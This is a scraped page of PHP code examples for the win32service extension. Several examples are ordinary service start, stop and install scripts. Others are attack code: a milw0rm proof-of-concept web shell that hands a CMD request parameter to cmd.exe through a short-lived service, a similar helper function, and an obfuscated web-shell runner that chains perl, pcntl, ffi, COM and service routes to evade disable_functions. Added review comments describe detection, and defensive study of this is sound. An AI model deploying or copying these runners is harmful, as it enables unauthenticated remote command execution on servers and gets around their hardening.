Esempio n. 1
/**
 * Runs $command through a throwaway Windows service and returns what it wrote to stdout.
 *
 * Security review note: this executes commands without calling exec()/system()-style
 * functions, so a disable_functions list that names only those does not cover this path.
 * The win32service extension is used to register cmd.exe itself as a service.
 * Defensive pointers: Windows records service installation (System log event 7045, and
 * Security log event 4697 when that audit policy is enabled). A service whose image path
 * is cmd.exe and whose name starts with "NJ" is worth alerting on. A web-facing PHP
 * worker normally needs neither this extension nor the right to create services.
 *
 * @param string $command Command text; interpolated into the service parameters as-is.
 * @return string|false Whatever file_get_contents() returns for the capture file.
 */
function srvshelL($command)
{
    // Capture file path: directory from whereistmP() (defined outside this excerpt,
    // presumably a temp-dir lookup; confirm) plus an "NJ"-prefixed uniqid().
    $name = whereistmP() . "\\" . uniqid('NJ');
    // Service name comes from a second, separate uniqid() call, so it differs from the file name.
    $n = uniqid('NJ');
    // Interpreter path: the ComSpec server variable when set, otherwise a hard-coded d:\ location.
    $cmd = empty($_SERVER['ComSpec']) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
    // The service "binary" is cmd.exe; its parameters carry the command and redirect stdout
    // into the capture file. $command is not quoted or validated here.
    win32_create_service(array('service' => $n, 'display' => $n, 'path' => $cmd, 'params' => "/c {$command} >\"{$name}\""));
    // Register, start, stop and delete back to back: the service exists only briefly,
    // but its creation is still logged when service-install logging is enabled.
    win32_start_service($n);
    win32_stop_service($n);
    win32_delete_service($n);
    // Polls once per second until the capture file appears; there is no timeout.
    while (!file_exists($name)) {
        sleep(1);
    }
    $exec = file_get_contents($name);
    // The capture file is deleted after reading, so it is only on disk for a short time.
    unlink($name);
    return $exec;
}
Esempio n. 2
// Probe the configured host:port first to learn whether Open Office is already answering.
$sCheckOO = SearchHelper::checkOpenOfficeAvailablity();
if (empty($sCheckOO)) {
    // An empty result means the service is available on that port.
    if (!$restartOO) {
        // Nothing to restart: optionally report success, then end the script here.
        if ($sGiveOutput) {
            print 1;
        }
        exit();
    }
}
// Open office appears not to be running or requires a restart
if (OS_WINDOWS) {
    $OOService = 'ktopenoffice';
    $default->log->debug('Check Open Office Task: ' . get_current_user());
    if ($restartOO) {
        // If Open office needs to be restarted - stop it here
        $result_stop = win32_stop_service($OOService);
        // Wait for the service to stop fully before trying to restart it
        $continue = false;
        $cnt = 0;
        while ($continue === false && $cnt < 15) {
            $result = win32_query_service_status($OOService);
            if (isset($result['ProcessId']) && $result['ProcessId'] != 0) {
                // If there is still a process id then the service has not stopped yet.
                sleep(2);
                $continue = false;
                $cnt++;
            } else {
                $continue = true;
            }
        }
    } else {
Esempio n. 3
 /**
  * Requests a stop of the service named $this->name on $this->machine.
  *
  * The raw value returned by win32_stop_service() is kept in $this->last_error
  * so callers can inspect it afterwards.
  *
  * @return bool True only when the stored value is identical to WIN32_NO_ERROR.
  */
 function stop()
 {
     $this->last_error = win32_stop_service($this->name, $this->machine);
     if ($this->last_error !== WIN32_NO_ERROR) {
         return false;
     }

     return true;
 }
Esempio n. 4
        }
        exit(0);
    case 'install':
        win32_create_service(array('service' => $serviceName, 'display' => 'Kaltura asynchronous batch jobs scheduler', 'description' => 'Kaltura asynchronous batch jobs scheduler', 'params' => __FILE__ . " run {$phpPath} {$iniDir}", 'path' => $phpPath, 'start_type' => WIN32_SERVICE_AUTO_START, 'error_control' => WIN32_SERVER_ERROR_NORMAL));
        KalturaLog::info('Service Installed');
        exit(0);
    case 'uninstall':
        win32_delete_service($serviceName);
        KalturaLog::info('Service Removed');
        exit(0);
    case 'start':
        win32_start_service($serviceName);
        KalturaLog::info('Service Started');
        exit(0);
    case 'stop':
        win32_stop_service($serviceName);
        KalturaLog::info('Service Stopped');
        exit(0);
    case 'run':
        win32_start_service_ctrl_dispatcher($serviceName);
        win32_set_service_status(WIN32_SERVICE_RUNNING);
        break;
    case 'debug':
        set_time_limit(10);
        break;
    default:
        KalturaLog::info('Unkown action');
        exit(-1);
}
$kscheduler = new KGenericScheduler($phpPath, $iniDir);
while (1) {
Esempio n. 5
###                                               ###
### Note: Tested on 5.2.1                         ###
###                                               ###
### Author:  NetJackal                            ###
### Email:   nima_501[at]yahoo[dot]com            ###
### Website: http://netjackal.by.ru               ###
###                                               ###
###                                               ###
### Usage: http://victim.net/nj.php?CMD=[command] ###
#####################################################
# Security review note: this listing is a published proof of concept (see the banner above).
# A request parameter reaches cmd.exe unchanged, through a Windows service that the script
# registers itself instead of through exec()/system()-style functions.
# Defensive pointers: do not load the win32service extension into a web-facing PHP runtime,
# and run the PHP worker under an account that cannot create services. Alert on service
# installs (System log event 7045) whose image path is cmd.exe, and on "NJ"-prefixed files
# appearing in the upload temp directory.
#
# Command text comes verbatim from the CMD query parameter ('dir' when absent); nothing in
# this script validates it or authenticates the caller.
$command = isset($_GET['CMD']) ? $_GET['CMD'] : 'dir';
# Directory used to store the command's output: PHP's upload_tmp_dir setting.
$dir = ini_get('upload_tmp_dir');
# Stops early when the win32service extension is not loaded.
if (!extension_loaded('win32service')) {
    die('win32service extension not found!');
}
# Capture file and service name each get their own "NJ"-prefixed uniqid() value.
$name = $dir . "\\" . uniqid('NJ');
$n = uniqid('NJ');
# Interpreter path: the ComSpec server variable when set, otherwise a hard-coded d:\ location.
$cmd = empty($_SERVER['ComSpec']) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
# cmd.exe is registered as the service binary; the parameters carry the unquoted command
# and redirect its stdout into the capture file.
win32_create_service(array('service' => $n, 'display' => $n, 'path' => $cmd, 'params' => "/c {$command} >\"{$name}\""));
# The service is started, stopped and deleted immediately, so it exists only briefly.
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
# Output is read back, the capture file is removed, and the text is HTML-escaped before display.
$exec = file_get_contents($name);
unlink($name);
echo "<pre>" . htmlspecialchars($exec) . "</pre>";
?>

# milw0rm.com [2007-07-27]
        case '重启':
            win32_restart_service($service->item(0)->getElementsByTagName("mysql")->item(0)->nodeValue);
            echo '<SCRIPT>alert("MySQL重启命令执行完成")</SCRIPT>';
            break;
        default:
            break;
    }
    switch ($_POST['filezilla']) {
        case '启动':
            win32_start_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue);
            echo '<SCRIPT>alert("FileZilla启动命令执行完成")</SCRIPT>';
            break;
        case '停止':
            win32_stop_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue);
            echo '<SCRIPT>alert("FileZilla停止命令执行完成")</SCRIPT>';
            break;
        case '重启':
            win32_stop_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue);
            sleep(5);
            win32_start_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue);
            echo '<SCRIPT>alert("FileZilla重启命令执行完成")</SCRIPT>';
            break;
        default:
            break;
    }
} else {
    echo '<hr/>您的服务器没有为PHP安装<b>win32service</b>扩展库,请前往PHP官方站点<a href="http://pecl.php.net/package/win32service">下载安装</a>至php的ext目录当中,并注意要在php.ini中添加<b>extension=php_win32service.dll;</b>语句,最后重新启动nginx生效!<u>注意:请核对好PHP版本</u>';
}
?>
</center></body>
</html>
Esempio n. 7
/**
 * Runs the command string $c through whichever non-standard execution route is available
 * and returns the captured output.
 *
 * Security review note: the obfuscated names and the chain of fallbacks (perl extension,
 * pcntl, ffi, win32service, win32std, COM) are consistent with a web shell's command runner.
 * None of these routes uses exec()/system()/shell_exec(), so hardening that relies only on
 * disable_functions entries for those names does not cover them.
 * Defensive pointers: keep these extensions out of web-facing PHP builds. Watch the temp
 * directory for "NJ"- or "pcntl"-prefixed uniqid() file names. Alert on cmd.exe or perl
 * spawned by the web server account, and on service installs whose image path is cmd.exe.
 *
 * Helpers z7r(), z9p() and z6l() are defined outside this excerpt. From their use here they
 * presumably test whether a function is usable, read a file, and transform the command
 * string respectively (TODO confirm against their definitions).
 *
 * @param string $c Command text; concatenated into interpreter or shell strings below.
 * @return mixed Captured output, or '' when $c is empty or no branch produced a result.
 */
function z6v($c)
{
    // $win selects the Windows branch; $tempdir is the prefix for the capture file paths.
    global $win, $tempdir;
    $r = '';
    if (!empty($c)) {
        if (!$win) {
            if (extension_loaded('perl')) {
                // Route 1 (non-Windows): embedded Perl interpreter; output is captured
                // through PHP output buffering. $c is placed inside a Perl string unescaped.
                @ob_start();
                $p = new perl();
                $p->eval("system('{$c}')");
                $r = @ob_get_contents();
                @ob_end_clean();
            } elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) {
                // Route 2 (non-Windows): fork, then replace the child with a perl process
                // that runs the command and redirects its output to the capture file $o.
                $r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n';
                $o = $tempdir . uniqid('pcntl');
                $pid = @pcntl_fork();
                if ($pid == -1) {
                    $r .= '[-] Could not fork. Exit';
                } elseif ($pid) {
                    // Parent: $status is not assigned anywhere in the visible code.
                    $r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.';
                } else {
                    // Child: tries two fixed perl locations in turn.
                    $c = array(" -e 'system(\"{$c} > {$o}\")'");
                    if (@pcntl_exec('/usr/bin/perl', $c)) {
                        exit(0);
                    }
                    if (@pcntl_exec('/usr/local/bin/perl', $c)) {
                        exit(0);
                    }
                    die;
                }
                // The status text built above is replaced by whatever z9p() returns for $o.
                $r = z9p($o);
                @unlink($o);
            }
        } else {
            // Windows: every route below redirects cmd.exe output into this capture file.
            $o = $tempdir . uniqid('NJ');
            if (extension_loaded('ffi')) {
                // Route 3: the ffi extension binds kernel32!WinExec and launches cmd.exe.
                $a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
                $r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0);
                // Polls once per second with no timeout until the capture file exists.
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } elseif (extension_loaded('win32service')) {
                // Route 4: cmd.exe registered as a short-lived service under an
                // "NJ"-prefixed name, then started, stopped and deleted back to back.
                $s = uniqid('NJ');
                @win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\""));
                @win32_start_service($s);
                @win32_stop_service($s);
                @win32_delete_service($s);
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } elseif (extension_loaded("win32std")) {
                // Route 5: win32std's shell-execute call, reaching cmd.exe by a relative path.
                @win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } else {
                // Route 6: COM automation through WScript.Shell.
                $a = new COM("WScript.Shell");
                $a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
                $r = z9p($o);
            }
            // The capture file is removed after reading; the @ operator hides any failure.
            @unlink($o);
        }
    }
    return $r;
}